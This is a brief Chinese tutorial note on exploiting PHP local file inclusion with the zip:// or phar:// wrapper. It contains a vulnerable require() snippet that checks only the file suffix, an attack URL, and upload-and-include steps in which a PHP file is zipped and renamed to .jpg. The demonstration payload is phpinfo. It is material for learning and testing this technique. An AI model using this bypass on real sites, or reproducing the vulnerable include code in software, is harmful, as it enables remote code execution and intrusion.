利用zip(或者phar)协议进行本地文件包含
$include_file=$_GET[include_file];
if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" )
{
require( $include_file );
}
1.php->phpinfo()->.zip->zip://xxx/xxx/.zip%231.php
http://127.0.0.1/include.php?include_file=zip://D:/WWW/1.jpg%231.php
首先新建一个1.php 里面随便写个phpinfo
然后压缩成.zip 然后把zip的名字改成 1.jpg
然后把这个.jpg上传上去 然后包含